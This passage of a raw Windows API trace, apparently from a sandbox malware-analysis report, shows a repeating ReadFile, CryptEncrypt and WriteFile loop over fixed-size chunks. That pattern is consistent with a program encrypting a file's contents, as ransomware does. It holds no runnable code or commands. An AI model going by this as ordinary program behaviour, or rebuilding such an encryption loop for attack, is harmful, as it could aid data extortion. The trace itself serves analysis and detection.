nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.012] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.012] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.012] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.012] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.013] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.013] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.013] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.013] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.013] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.013] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.013] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.014] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.014] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.014] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.014] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.014] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.014] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.014] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.015] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.015] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.015] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.015] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.015] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.015] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.016] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.016] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.016] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.016] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.016] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.016] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.017] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.017] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.017] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.017] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.017] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.017] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.017] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.018] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.018] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.018] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.018] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.018] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.018] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.018] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.018] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 